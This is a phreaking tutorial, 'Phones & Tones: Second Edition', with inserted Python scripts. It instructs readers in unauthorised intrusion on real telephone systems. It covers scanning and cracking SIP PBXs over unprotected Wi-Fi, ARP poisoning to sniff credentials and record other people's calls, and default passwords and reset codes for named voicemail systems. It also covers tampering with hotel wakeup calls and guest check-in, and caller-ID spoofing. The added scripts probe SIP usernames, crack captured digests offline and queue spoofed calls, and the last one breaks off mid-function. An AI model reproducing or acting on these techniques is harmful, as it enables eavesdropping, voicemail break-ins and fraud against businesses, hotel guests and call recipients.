Phones & Tones: Second Edition
by Murder Mouse

Section 1: The Introduction
----------------------------

Greets and meets. Well, it's definitely been a while since my last tutorial, and with a new decade upon us now is as good a time as ever for a much needed update. Phreaking has definitely seen some changes since I wrote the original release. Joybubbles is gone, VoIP is now the standard for almost any PBX, and in most cities in the US payphones are just a memory. In fact, as I'm writing this the FCC is already debating how to convert the entire PSTN to VoIP. As decades come and go the landscape of telephony is constantly changing, and with it so does phreaking. Whether the calls are carried through tandems or routers (technically on a landline it's both) the drive to explore and understand this landscape will always keep phreakers going. So it's in this spirit that I write this guide.

One thing I'd like to point out before I get started is that I have decided to write this a little differently than my original release. I've stripped away much of the technical detail in favor of keeping the guide as simple and straightforward as possible. However, this means that I'm writing this guide with the assumption that you, the reader, already have at least a basic understanding of telecommunications. I've included some links and suggestions near the end of this guide, and I'd suggest you check through them if you need to. So with all that said, let's begin.

Section 2: Exchange Scanning
-----------------------------

Well, as before, let's start this discussion off with an explanation of exchange scanning. Exchange scanning, for those of you who don't know, is simply picking up the phone and dialing down a range of phone numbers to see what you come up with. This is how you will find all those interesting numbers you can fuck with and share (voicemail systems, test numbers, ANACs, strange recordings, etc.). So how do you get started?
Well, an exchange, also known as the NXX, is the middle three digits of any phone number (i.e. the xxx in 555-xxx-1337; the first three, the NPA, are the area code). Most people when they first get started scan their own exchange, usually starting with the low end of the exchange (NPA-NXX-00xx). So you would start off dialing NPA-NXX-0000, write down what you hear, then move on to 0001, 0002, and so on and so forth. If you're the paranoid type you might want to randomize your call sequence in order to make it slightly less obvious what you've been up to. As in go from 0000, to 0021, to 0076, to 0014, etc. until you've scanned the first 100 numbers on the exchange. This of course is entirely up to you, and at least in the United States exchange scanning is legal in most areas (I think I remember reading about a law in Connecticut concerning this, but I'm not really sure on that).

So anyway, when scanning you will probably want to make a list for yourself of the results for later review or to share. It's best to make some legends (acronyms) for yourself in order to abbreviate some of the most common finds while you're scanning. Provided below is the list I use for all of mine, which is partly based on the standard proposed on binrev a couple of years back..

CC   - Cannot be completed
CR   - Cannot be reached from your calling area
NS   - Not in service
D    - Disconnected
CB   - All circuits busy
RO   - Reorder
B    - Busy
FX   - Fax machine
R    - Rings
HELO - Hello? (a person answered)
VM   - Voicemail (an individual mailbox)
VMS  - Voicemail system (the login line itself)

Of course you're free to use whatever legends you like, but just be sure you leave a list of them at the top of your exchange scans if you plan on sharing them with anyone. If you need some examples to go on you can check out some of Information Leak's exchange scans below...

www.informationleak.org/viewforum.php?f=43

Anyway, it's best to scan during different times of the day depending on what kind of exchange scan you are doing.
For local exchange scans, or any scans likely to hit a lot of residential lines, it's best to scan anywhere from mid-morning to mid-afternoon if you can. This is because most people will be up and out of the house (work, school, whatever). Of course any time that doesn't involve interrupting people's much needed sleep will work just fine. On the other hand, if you're doing a toll free scan (1-800, 866, etc.) or scanning a range assigned to a specific PBX (more on this later) then you'll want to scan in the middle of the night (after business hours).

So with all that said I'll close this section as I did last time by helping you identify some of the sounds you'll be coming across while scanning..

Fax Machines - No need to tell you what a fax machine is, but you'll come across many of them while scanning and being able to pick out their tones can be important. Most fax machines you'll come across will have a modem sound (like the sound a modem makes when using dialup), but with a slightly flatter sounding series of tones. It's kind of hard to describe, but once you hear it it's easy to notice. Of course some other fax machines have completely different tones. Some have a low pulsing tone, and some others have a much more drawn out series of tones than most. You'll hear all of them as you're scanning so it's a good idea to get familiar with these tones early on.

Milliwatt Test Numbers - These are one of the most common test numbers, and you'll be painfully aware of what they are when you stumble across one, literally. The tone is a very loud, constant tone (a 1004 Hz test tone at 0 dBm, which technicians use to measure line loss).

ANACs - These are very common numbers to come across, but if you're not paying attention to the recordings you are stumbling across you can easily miss them.
These are especially common during toll free scans due to how many business recordings will read off the ANI (and in some extremely rare cases even include the ANI II digits; feel privileged if you manage to snag a number like this). On the other hand the ANACs that line technicians use are pretty easy to discern since the recording will just immediately read off the ANI. All I can tell you is pay attention.

DISAs - DISA (Direct Inward System Access) is the feature that lets a remote caller dial into a PBX, enter a code, and get the PBX's own dial tone to place calls through it. Needless to say these are a lot less common to come across than they were just a few years ago. This, like I said in the introduction, is because most businesses, departments, etc. have upgraded their PBXs to VoIP systems. If you do come across these though you will recognize them in a wide variety of ways. Some of the older analog systems have a low, steady tone upon connecting, but I haven't really heard these any time I scan. Most of the analog PBXs still up and kicking will pick up with either complete silence (meaning it's waiting for DTMF input) or a dial tone. Of course there are some other types of systems besides DISAs that may sit and wait for DTMF, but commonly the login process is still the same regardless.

DATUs - DATUs (Direct Access Test Units) are one of the best finds you can come across, but I'm not really sure how common a find they are these days since DATUs have never really been a part of the telco here. Before AT&T bought the area out, BellSouth was using VoiceSystems, which functioned just like DATUs but required a specific modem in order to access the prompt (otherwise it would just hang up as soon as you called it up). Either way these are administrative lines used by line technicians for basic repair and tests on subscriber lines within a given exchange, and you'll recognize one as a half ring followed by a low tone. I'll link some information on it later in the guide.
VMBs - Of course by VMBs I don't mean the individual mailboxes you'll come across when scanning PBXs and such, but specifically the voicemail system lines for logging in and checking messages on the mailboxes. Just like ANACs, to fish these out you have to really just pay attention to any recordings you come across. Some voicemail systems will announce what kind of system it is as soon as you connect, while others will just go straight to asking for your user ID. What to do from here will be discussed in a later section.

Also, once you get a handle on exchange scanning you should look into unpublished exchanges. Most of the codes you won't find in the book are the N11 codes you normally dial to reach common services (411, 911, 211, etc.), but depending on the LEC there may also be a telco exchange used just for test numbers (like 959 in the AT&T areas). To get unpublished exchanges just go to nanpa.com and look for the Central Office Code Assignments that are close to your area (remember, Utilized means the code is in use). Compare this list to the list in your phone book, and any exchanges that aren't listed in the phone book, besides the obvious service codes mentioned before, can be considered special interest exchanges.

Finally, before I finish here I should mention that if handscanning seems too daunting for you and you really want to go the wardialer route (to each their own) and you're a Linux user then I'd suggest looking into iWar. It has plenty of nifty options, including support for protocols like IAX2 so you can dial through a VoIP trunk instead of a modem. Check the link below for details..

www.softwink.com/iwar/

Section 3: Hacking PBXs
------------------------

Well, now that we're done with exchange scanning we can move on to PBXs. How you will go about exploring, exploiting, fondling, or whatever you feel like doing with a PBX varies greatly depending on the kind of PBX it is, but a great place to start either way is to do a little poking around on the phone.
First crack open the phone book or go over to superpages.com and look up any business/department/etc. you have in mind to see all the listed numbers for that organization. Some of the larger businesses in your area may have a range of numbers reserved. If so you will see that all of the listed numbers are basically the same. Say the main office line is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting department is NPA-NXX-5542. Then it's safe to assume that a great place to start is to scan the NPA-NXX-55xx range. Take note of all the numbers listed and start exchange scanning down the rest to see what you come across.

Otherwise, if there isn't a range to scan, try calling the main line (after business hours of course) and listen through the recording. Sometimes the recording will go through a list of extensions for different departments that the caller might be inquiring about. Listening through this gives you the opportunity to figure out the extension range, which you can then scan through like you would an exchange scan. Say the main office is 10, the accounting department is 15, the senior manager is 22, and so on and so forth; then it's safe to assume that the range goes anywhere in between 10-99. So just like an exchange scan you would take note of all the extensions listed, and then just keep calling back and trying all the extensions that weren't mentioned. Most of the interesting extensions that you'll come across will be at the end of the range (50, 99, 9999, wherever the extension range ends) since all the office/department lines are going to be assigned from the start on up. If all you're after is the voicemail system (more on these later) then you can cut short how many times you have to call back by scanning up in 10s. Say the main office line is 10; then you can start at 20 and just keep going up until you find what you were looking for.
Otherwise, trying them all will at the very least, as would an exchange scan, give you a decent idea of what kind of PBX you are dealing with. Say you hear a lot of Audix mailbox recordings; then you are dealing with an Avaya PBX (Audix is Avaya's voicemail, and Avaya is a very popular VoIP PBX). At the very least listen out for anything that could help you identify what exactly you're up against, and use Google to do a little bit of homework on it. User guides, installation manuals, and any of the vendor sites can give you a plethora of information that you can use later on (default passwords, etc.).

So let's say for starters that you're scanning an analog PBX and happen to come across a DISA line. Well, from here you would try guessing the passcode and seeing if you get lucky. Try combinations like 9999#, 1234#, etc. and if you catch a dial tone then consider yourself lucky and use it however you like (dial out, fuck around with it a little, whatever).

Of course a more likely scenario when scanning is that you don't find a DISA line, but instead cop enough recordings to figure out what kind of VoIP PBX you're dealing with and get all the information you need on it (Avaya, ShoreTel, etc.). Well then you'd pack up your laptop with a softphone like X-Lite downloaded (in case you want to dial out), get over around the business you're targeting (during business hours), and see if there are any wireless access points you can use. How to crack the key if it's protected is beyond the scope of this tutorial, so let's just say for shits and giggles that there is an AP and it's unprotected. Well, a good start from here would be to start scanning the network for SIP servers. The port for these is 5060 on either UDP or TCP (5061 for SIP over TLS), so in nmap you would scan for both with the following (both scan types need root)..

nmap -sU -sS -p 5060,5061 192.168.1.1-254

Keep in mind that nmap reports a UDP port as open|filtered when nothing answers its empty probe, so a SIP-aware check (nmap's -sV, which sends a SIP OPTIONS request, or the sipvicious svmap script mentioned below) is the better confirmation. Another more thorough option for Windows users is to download SiVuS and scan the network that way.
SiVuS has an entire suite of tools that you can use in order to enumerate any information you can and attempt some common hacks against the server (REGISTER attempts, all that good stuff). Link provided below...

www.vopsecurity.org

Also, while I'm giving program suggestions, I would recommend checking out sipvicious, which is a set of Python scripts (svmap, svwar, svcrack) that can be used for scanning, enumerating, and cracking SIP proxies and servers on the network.

http://sipvicious.org/blog/

So let's say of the three you decide to use SiVuS to scan for any weak points in the network. You will first want to see if you can find any SIP servers. First go to SIP Component Discovery and in the "Target network" field enter something like 192.168.1.1-254 (whatever the network range is) and then click Scan. Let this play through and see if you find any SIP servers. If you do, now you can scan the SIP server for any common attacks. Just go to the SIP Scanner tab and click on Scanner Configuration. Enter the SIP server you found before and check "Probe Targets". From here you can also configure other aspects like what sort of authentication to use (most SIP servers use MD5 digest, but cleartext still isn't completely out of the question), what sort of method checks to use, security checks, the log file to save, and other aspects of the scan. Then just click over to the Scanner Control Panel tab and initiate the scan.

Now what you can do from here depends on what you come across while scanning the network, and what your SIP server scan pulled. A great place to start if the scan didn't pull anything useful in your case is to try and grab some usernames on the server. To try this you have two options. You can either manually test usernames with SiVuS, or use Cain & Abel to try and sniff usernames over the network. To manually test possible usernames in SiVuS go to Utilities/Message Generator and fill out the appropriate information.
For example, set Method to REGISTER, Called User to the user you are attempting to get a response from, Domain Host to the IP or hostname of the SIP server you discovered, change the To to the user you are testing and From to whatever, and change Subject and User Agent to make it less obvious on the network what exactly you are doing. Then click Start and see what sort of response you get from the server. A 401 response (a digest challenge) means the server is willing to authenticate that username, and a 403 means it rejected it outright. The caveat is that a lot of servers deliberately answer every REGISTER with a 401 whether the user exists or not (Asterisk's alwaysauthreject option does exactly this), so a challenge only tells you something once you've confirmed that a made-up name gets a 403 from the same box.

A good scheme to use if you are somewhat familiar with the business/department you are dealing with is to try the names of employees who work there. For example the first name, first initial and last name, first name and last initial, etc. This is a popular scheme for a lot of places so it's definitely worth a try. Even if you aren't familiar with the place you can try to take a casual visit into the business/department and keep a mental note of any of the employee names for future reference.

Of course, depending on the network, it can many times be a pretty hefty task trying to test every possible username that way, so let's get into sniffing over the network for possible usernames. For this, like I said earlier, we will be using Cain & Abel, which can be downloaded here..

www.oxid.it/cain.html

Now what we first have to do is establish an ARP poison route on the network. To do so open up Cain & Abel and go to Configure. From here select your network card and click OK. Start the sniffer, go to the Sniffer tab, and click the + sign; this will bring up the MAC Address Scanner. "All hosts in my subnet" should be active so just press OK. Now switch to the APR tab at the bottom and click the + sign again, and you should see a list of hosts on the network on the left side. Click on the IP of the SIP server and select all the IPs on the right side, then just click OK. Now you can sniff all the usernames that pass over the server by looking through the To, From, and Contact fields on everything that passes through.
Now, from here one way or another you should have a decent list of usernames, so it's time to crack any of these users to get the password. From here you have two routes to go with, passive and active cracking.

We'll first start off with active cracking. Open up SiVuS again and go to Utilities/Authentication Analysis. Here you will see Realtime Analysis on the left side of the window. Enter one of the users you found in the Called User field, and the IP of the SIP server in Domain/Host. Then enter the username and password files and press Start. A good thing to go ahead and note is that a common password scheme is for the pass to be the same as the username, or the telephone/extension number of the user. So incorporating these into your password list would be a good idea. Of course the problem with active cracking is that most SIP servers will lock you out after 3 or so failed attempts, thus bringing us to our second option: passive cracking.

For this let's assume that you still have Cain & Abel open from enumerating the usernames. From the Sniffer tab click on the Passwords tab, and scroll down till you see SIP. From here you should see some captured hashes, which you can then right click on and select either dictionary or brute force. What you've captured is the digest from a REGISTER: the username, realm, nonce and URI are all in the header in the clear and only the password is unknown, so every guess can be checked offline by recomputing MD5(MD5(user:realm:pass):nonce:MD5(REGISTER:uri)) and comparing it to the response field, with no lockouts and nothing sent to the server. If you choose dictionary crack just load the dictionary file the same way you would with an active crack, and then on the right side you will see some options you can choose to use with your dictionary file (reverse, double, numbered, etc.). Brute force is pretty straightforward, but not recommended.

You can also, if you like while messing around with Cain & Abel, use it to capture and listen in on conversations going over the LAN. To do this just establish an ARP poison route as you did before when sniffing out usernames, but instead of clicking on the SIP server just highlight all the hosts on the network, and any host connected to them.
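Added example, written for this edition and not taken from the guide, SiVuS, sipvicious or Cain & Abel: a small Python script showing what the two SIP tricks above do on the wire, the REGISTER probe and status-code reading behind the username test, and the offline recomputation behind "passive cracking" of a captured REGISTER. Everything in it (addresses, realm, nonce, the captured header and the wordlist) is constructed for the example; it assumes plain MD5 digest with or without qop=auth, which is what nearly every SIP registrar uses.

```python
"""Added example (not from the guide, SiVuS, sipvicious or Cain & Abel):
  1. username probing: one bare REGISTER per candidate, read the status code
     (401/407 = challenge, 403/404 = rejected outright);
  2. "passive cracking": a captured Authorization header carries username,
     realm, nonce, uri and the MD5 response, so each guess is checked offline.
All addresses, the realm, the nonce and the captured header are constructed."""
import hashlib
import re
import socket
import uuid
from typing import Iterable, Optional


def build_register(user: str, domain: str, local_ip: str = "192.0.2.10",
                   local_port: int = 5060, user_agent: str = "X-Lite") -> bytes:
    """Bare REGISTER that provokes a challenge; User-Agent kept ordinary on purpose."""
    tag, call_id = uuid.uuid4().hex[:8], uuid.uuid4().hex
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]          # RFC 3261 magic cookie
    return (
        f"REGISTER sip:{domain} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {local_ip}:{local_port};branch={branch};rport\r\n"
        "Max-Forwards: 70\r\n"
        f"From: <sip:{user}@{domain}>;tag={tag}\r\n"
        f"To: <sip:{user}@{domain}>\r\n"
        f"Call-ID: {call_id}@{local_ip}\r\n"
        "CSeq: 1 REGISTER\r\n"
        f"Contact: <sip:{user}@{local_ip}:{local_port}>\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Expires: 60\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode()


def status_code(response: bytes) -> int:
    """Numeric code from the status line, e.g. b'SIP/2.0 401 Unauthorized'."""
    first = response.split(b"\r\n", 1)[0].decode(errors="replace")
    m = re.match(r"SIP/2\.0 (\d{3})\b", first)
    if not m:
        raise ValueError(f"not a SIP response: {first!r}")
    return int(m.group(1))


def classify_user(response: bytes) -> str:
    """Caveat: a registrar with Asterisk's alwaysauthreject=yes challenges unknown
    users too, so 'challenged' only means 'exists' if a bogus name gets 'rejected'."""
    code = status_code(response)
    if code in (401, 407):
        return "challenged"
    if code in (403, 404):
        return "rejected"
    return f"other:{code}"


def probe(user: str, domain: str, server_ip: str, timeout: float = 2.0) -> str:
    """Live version over UDP/5060 (not exercised offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_register(user, domain), (server_ip, 5060))
        data, _ = s.recvfrom(4096)
    return classify_user(data)


def parse_digest(header: str) -> dict:
    """'Authorization: Digest a="b", c=d' -> {'a': 'b', 'c': 'd'}."""
    body = re.sub(r"^(Proxy-)?Authorization:\s*", "", header.strip(), flags=re.I)
    body = re.sub(r"^Digest\s+", "", body, flags=re.I)
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]*)', body)}


def digest_response(user: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, qop: Optional[str] = None, nc: str = "", cnonce: str = "") -> str:
    """RFC 2617 as used by RFC 3261: MD5(HA1:nonce[:nc:cnonce:qop]:HA2)."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    middle = f"{nonce}:{nc}:{cnonce}:{qop}" if qop == "auth" else nonce
    return hashlib.md5(f"{ha1}:{middle}:{ha2}".encode()).hexdigest()


def scheme_candidates(user: str, extension: str) -> list:
    """The weak schemes the text warns about (pass = user, pass = extension) plus a
    few keypad favourites; order preserved, duplicates dropped."""
    out = []
    for cand in (user, extension, extension[-4:], "1234", "0000", "1111", "2580"):
        if cand and cand not in out:
            out.append(cand)
    return out


def crack_captured(header: str, method: str, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the response for each candidate; the one that matches is the password."""
    p = parse_digest(header)
    for cand in wordlist:
        calc = digest_response(p["username"], p["realm"], cand, method, p["uri"], p["nonce"],
                               p.get("qop"), p.get("nc", ""), p.get("cnonce", ""))
        if calc == p["response"]:
            return cand
    return None


# Constructed samples, not real captures.
SAMPLE_401 = (b"SIP/2.0 401 Unauthorized\r\n"
              b'WWW-Authenticate: Digest realm="asterisk", nonce="4f2a0c1e"\r\n'
              b"Content-Length: 0\r\n\r\n")
SAMPLE_403 = b"SIP/2.0 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
# REGISTER from extension 1001 whose password is its own extension; the response
# is computed here so the sample is internally consistent.
_WEAK = digest_response("1001", "asterisk", "1001", "REGISTER", "sip:192.168.1.20", "4f2a0c1e")
CAPTURED_AUTH = ('Authorization: Digest username="1001", realm="asterisk", nonce="4f2a0c1e", '
                 f'uri="sip:192.168.1.20", response="{_WEAK}", algorithm=MD5')
```

Run crack_captured(CAPTURED_AUTH, "REGISTER", scheme_candidates("1001", "1001")) and it returns "1001" on the third candidate without touching the network, which is the whole point of the passive route: the lockout counter on the server never moves. The same parse_digest/digest_response pair also verifies against the worked example in RFC 2617 section 3.5, so if you change the code, keep that check.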
Then, when you have the sniffer going, just go to the VoIP tab from the Sniffer tab and let that run for a while. That is basically it; from here Cain & Abel will start capturing, decoding, and recording any conversations going across the LAN. This only works because the audio is plain RTP; if the phones are using SRTP you'll still capture the streams but won't be able to play them back.

There are endless other vulnerabilities you can use related to the hard phones used, the software used (IAX vulns abound), etc. However, for the sake of sanity I'm going to cut this section here and leave it to you to look into anything else you may want to try against the PBX.

Section 4: Hacking Voicemail Systems
-------------------------------------

Well, now that we're finished discussing PBXs let's move on to VMBs. In the original release of Phones & Tones I basically slacked through it by linking up some tutorials from oldskoolphreak. Unfortunately most of the VMB hack tutorials floating around nowadays are pretty dated so I couldn't really slack through this section even if I wanted to. The methods are pretty much the same as ever, except that some voicemail systems popular these days (Audix for example) have no system account accessible through a TUI. This means for these you have to be on the LAN itself to access any administrative functions.

Let's start with Audix. This is by far one of the most popular voicemail systems, and it's used on Avaya PBXs. As mentioned before, the administrative functions themselves are handled on a server within the LAN, which is unavailable outside the LAN. However, you can remotely try to break into individual mailboxes. Just dial in, and as the announcement is playing hit # to access the login. While default passwords are determined by the administrator there are some common schemes you can try. Passes can be any length between 1-15 digits, but most will be between 4-15. Some common passes to try are 111111, 123456, the phone number of the mailbox (or the last 5 digits), etc.
Just hit # again after entering the pass attempt, and if you are successful you can hit 4 to review stored messages or hit 3 to record a new greeting.

Now let's move on to Merlin Mail. Unlike Audix, Merlin does have a system administrator box for you to use. In order to access this from the main line hit 9997#. From here you will be prompted to enter a pass. The default pass depends on the version being used. For versions 1 and 2 the default pass is 1234#, and for version 3 it's 123456#. The good thing about these is even if the default passes don't work you can reset the system to default (if you're feeling that malicious). Just hit 2537 (CLER on the keypad), and you should hear a "goodbye", which will then disconnect you. Just call back to the system and then punch in the default pass to access the system admin box. Now from here you can hit 9 to access the administrative functions. In versions 1 and 2 it goes straight to these options upon selecting, while with version 3 it will prompt you for a second login (the default pass is 654321#). From there just shift through the options and take your pick.

Another popular voicemail system is PartnerMail VS. This one is actually very insecure in my opinion and I have no clue why it's so popular on business PBXs. The problem for one is that the pass limit is 4 digits. That's it, 4 digits and under is all anyone has to work with, which comes to only 11,110 possible codes even if you count every length from 1 to 4 digits. The system admin box is 99, and the default pass for these is 1234. Unlike other systems (Audix and CallPilot for example) the system doesn't force anyone to change the default pass, so there is definitely a stronger chance that even the system admin account might still be set at default. Though even if not you can still try other combinations (4321, 1111, 2580, etc.). From here you can create a mailbox for yourself on the system by hitting 4. The system will read back what mailbox numbers are available, and prompt you to enter one in.
Just enter one in that isn't used (preferably on the higher end of the range) and hit # to confirm your choice. Of course even if you can't access the admin box to create your own mailbox you can try to break into any of the other mailboxes on the system. They all have the same default pass, and if that doesn't work you can try the combinations mentioned before or the extension/mailbox number of the user.

Now that we're done with that let's move on to Cisco Unity VMBs. These are popular on a lot of college campuses (as are Cisco SIP hardphones, and basically anything Cisco). For these, as soon as you reach the main line you would hit * and enter the ID of the mailbox. This would be the phone number of the user, and the pass that follows by default would be the same as the ID. If this doesn't work you can try the same combinations as always (1234567, 7654321, 1111111, 1235789, etc.). If you manage to guess the right pass, from here you can hit 1 to listen to any messages, 3 1 to listen to any saved messages, and 4 1 to change the VMB greeting.

So now that we've gone over campus VMBs let's move on to hotels. A popular system that many hotels use is DuVoice. Now the beautiful thing about playing around with a system like this is how integrated it is with the hotel operations, as you'll find out. First let's go over the voicemail system itself. There are two accounts that are going to be of interest to you: 0 is the operator mailbox, and 991 is the greeting box. This greeting box is used for recording greetings on the system for the following day. The default pass for these is * 1234. Even if the default has been changed the pass should still be in the 4 digit range, so treat it as you would a PartnerMail VS system. However this isn't even the half of the story. DuVoice also has DuVoice Hospitality. This is the system used to give out temporary mailboxes for guests to use, which is integrated into an administrative TUI.
To access this from the main line hit **97. Now there are a few levels of access you can use, rated from basic to expert. For our interests it's best to go with expert. The default pass for this is 7890#. From here you have 3 options: automatic wakeup call, re-record hospitality prompts, and guest room administration.

In case you want to be a dick and set someone up for an impromptu wakeup call, select 1, enter the mailbox number, enter the hour (00-23, military time), enter the minute (00-59), then it'll ask you if the hour is between 1-12. So then after that prompt you'll select 1 for AM, or 2 for PM. Then press 1 to accept, and then set the day for the wakeup call: 1 for today, 2 for tomorrow, and 3 to set the date.

If you decide to spare the guests you can also go in and re-record the prompts by selecting 2 from the main TUI menu. From here you can press 1 to re-record the wakeup message, 2 for the wakeup announcement, 3 for the manager's welcome message, 4 for the text message notification, and 5 for the default greeting. From any of these it should play the current message. You can from here hit 1 to accept, 2 to re-record (press # when done), 3 to delete, and 4 to restore the original.

Finally, for guest room administration press 3 from the main TUI. From here you have three options: 1 to check in, 2 to check out, and 3 to move. From any of these it will prompt you to enter the mailbox number followed by the # sign.

There are definitely other voicemail systems that I could cover, but I'm going to cut it short here. There is Mitel, where the mailboxes have a default password of 1234 (and a LAN HTTP server for configuration, http://192.168.215.1:8180 by default). CallPilot mailboxes you would treat like Audix; both are fairly secure compared to some other voicemail systems. By far the most secure, I think, is IP Office.
By default it doesn't have any means of remote administration, and the configuration can only be accessed via the user's extension (not exactly impossible, but a lot of effort for just one VMB). With everything else you stumble across just do your homework, google what you can, and see what you can find on it.

Section 5: ANI Spoofing
------------------------

Well, as before, let's move on to ANI spoofing. ANI, as you should know, is the way in which you, the calling party, are identified over the PSTN for billing. This is completely separate from the CPN (caller ID): in SS7 the two travel as different parameters of the call setup message (Charge Number versus Calling Party Number), which is why one can be spoofed or withheld without touching the other. When ANI spoofing was first being popularized by Lucky225 it was as simple as picking the right operator (one that didn't forward ANI) and having them forward the call to its destination. Nowadays of course any op is going to be able to forward ANI; however, there are still plenty of toll free termination providers you can use. Before getting into that I'll first, as before, go over the list of ANI II assignments. These are the two digits preceding the ANI that identify the type of call being placed and the kind of line it's placed from. Linked below is a list of the assignments used..

http://www.nanpa.com/number_resource_info/ani_ii_assignments.html

I'm going to first start off with Google Voice. Google Voice of course has a lot of options, and if you can cop an invite I would suggest getting an account yourself. One of these features is an outgoing call feature. Now while this normally will pass your CPN, you can use *67 before you call up your GV number in order to pull an ANI spoof. You can use this to dial any toll free number, or call 800-CALL-ATT or something in order to op divert to another number. Of course I'm not sure how long this will last (credits to JmanA9 for bringing this up on binrev) so try not to do anything too stupid with this.
If, however, you don't have a GV account or this trick no longer works by the time you read this, you can try some toll free termination numbers to do the same thing. Check the list below for details..

http://www.voip-info.org/wiki/view/Toll+Free+Termination+Providers

Section 6: CPN Spoofing
------------------------

So let's move on from ANI to CPN spoofing. This is of course a bit more useless than ANI spoofing, and is really just something to play around with for shits and giggles. It won't really keep your call anonymous (since your ANI is still carried over).

The first tip I really have is using SOB Caller ID Generator, which can be downloaded below..

http://www.artofhacking.com/orange.htm

It does have instructions on the download page and in the help file, but the use of this program is pretty straightforward. What it generates is the Bell 202 FSK burst that the CO normally sends to a phone to deliver caller ID, so it only fools the display on the far end's phone, not anything in the network. You can click Format to select the standard you will use. Unless you are hooking this up to the phone line in order to directly spoof the CPN on your own CPE (in which case you would use Standard, the on-hook format sent between the first and second ring) the Call Waiting format is fine, since that's the off-hook (Type II) version a phone expects mid-call. So just punch in the name and number you wish to display, plug a pair of headphones into the speaker port on your computer, call the landline you want, and any time after the person has picked up (yup, nothing to listen to your CAS tones before the other party picks up) put the headphones against the mouthpiece and press the Play button to send over the spoofed CPN info. Of course all of this, and anything else that relies on tones, will be completely outdated whenever the FCC successfully converts the entire PSTN over to VoIP, but for now this works just fine in the US (the tones can vary greatly in other countries).

There are, however, plenty of other ways to spoof your caller ID which are far more effective. The best way to spoof caller ID is to use Asterisk, which can be downloaded below..

www.asterisk.org/downloads

Asterisk is an open source VoIP PBX that you should really get familiar with.
I'll include some links near the end of this guide so you can install and configure your Asterisk setup. For now though let's talk about how to use Asterisk to spoof your CPN. Let's say you have Asterisk installed and have set up an account with a provider. From here you will need to create the call file. This is what you will use to specify who you are calling and the spoofed number you are providing. Let's say for this example that your number is NPA-NXX-1337, you want to call NPA-NXX-5148, and you want to spoof the number as NPA-NXX-6798. Just create /tmp/spoof.call and insert the following...

Channel: IAX2/username:password@provideraddress.com/1NPANXX1337
CallerID: NPANXX6798
MaxRetries: 5
RetryTime: 60
WaitTime: 30
Context: spoofing
Extension: NPANXX5148
Priority: 1

The Context and Extension lines only mean something if your extensions.conf actually has a [spoofing] context with a matching extension that Dial()s out through the provider; Asterisk drops the answered call into that context, it doesn't dial the Extension on its own. Then log in as root, start up Asterisk, and run the following command..

mv /tmp/spoof.call /var/spool/asterisk/outgoing/

Use mv rather than cp: Asterisk picks a file up the moment it appears in the spool directory, and a cp can be read before it has been fully written (if /tmp and the spool are on different filesystems, stage the file somewhere under /var/spool/asterisk instead so the move is a single rename). Asterisk will automatically detect the call file and call your number, then when you answer it runs the [spoofing] extension, which dials the number you want to call with the caller ID you provided. I have to warn you of course that caller ID spoofing is against the TOS for most VoIP providers, so don't try this trick with providers that you want to keep around.

If Linux just isn't your bag and you have the cash to burn then I have to at least mention all the caller ID spoofing providers out there. The two main ones these days are phonegangster.com and, of course, spoofcard.com. Personally, if you have to go this route I would suggest using spoofcard.com. It has an option to change your voice, though I haven't really used it before so I can't tell you how well it works. There's also SpoofApp (www.spoofapp.com), which if you have an iPhone handy allows you to forward any outgoing calls through the spoofcard service. The choice is yours, but I would really suggest just using the Asterisk technique assuming you don't need much mobility in your spoofing.
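Added example, mine rather than the guide's or the Asterisk project's: a Python script that renders the call file above from parameters (so a stray non-digit in the Extension or CallerID is caught before Asterisk ever sees it) and hands it to the spool the way the Asterisk documentation recommends, written to a staging directory on the same filesystem and then renamed into place, so the spool reader never picks up a half-written file. Assumptions that are not in the original: the numbers are 555 placeholders, the IAX2 peer is defined in iax.conf, the staging directory /var/spool/asterisk/tmp exists, and a [spoofing] context in extensions.conf Dial()s ${EXTEN} through the provider.

```python
"""Added example (not from the guide or the Asterisk project): render the call
file from the text and drop it into the spool atomically. Assumed, not in the
original: 555 placeholder numbers, an IAX2 peer in iax.conf, a staging dir on
the same filesystem as the spool, and a [spoofing] dialplan context."""
import os
import re
import tempfile
from typing import Optional

SPOOL_DIR = "/var/spool/asterisk/outgoing"
STAGE_DIR = "/var/spool/asterisk/tmp"   # same filesystem as SPOOL_DIR, so rename() is atomic


def is_number(value: str) -> bool:
    """Bare digits only: the Extension is matched in the dialplan and the
    CallerID is handed to the provider, so nothing else belongs in either."""
    return re.fullmatch(r"\d{1,15}", value) is not None


def render_call_file(channel: str, callerid: str, extension: str, context: str = "spoofing",
                     max_retries: int = 5, retry_time: int = 60, wait_time: int = 30) -> str:
    """Call file text with the keys the guide uses (Asterisk reads them case-insensitively)."""
    if not (is_number(callerid) and is_number(extension)):
        raise ValueError("callerid and extension must be digits only")
    lines = [
        f"Channel: {channel}",
        f"CallerID: {callerid}",
        f"MaxRetries: {max_retries}",
        f"RetryTime: {retry_time}",
        f"WaitTime: {wait_time}",
        f"Context: {context}",
        f"Extension: {extension}",
        "Priority: 1",
    ]
    return "\n".join(lines) + "\n"


def drop_call_file(text: str, spool_dir: str = SPOOL_DIR, stage_dir: str = STAGE_DIR) -> str:
    """Write into stage_dir, then rename into spool_dir. The rename is a single
    atomic step on one filesystem, which a cp straight into the spool is not."""
    fd, staged = tempfile.mkstemp(prefix="spoof-", suffix=".call", dir=stage_dir)
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    dest = os.path.join(spool_dir, os.path.basename(staged))
    os.rename(staged, dest)
    return dest


def dry_run(base_dir: Optional[str] = None) -> str:
    """Exercise both functions against scratch directories instead of the real
    spool and return what landed in the fake outgoing/ directory."""
    base = base_dir or tempfile.mkdtemp(prefix="astcall-")
    spool, stage = os.path.join(base, "outgoing"), os.path.join(base, "tmp")
    os.makedirs(spool, exist_ok=True)
    os.makedirs(stage, exist_ok=True)
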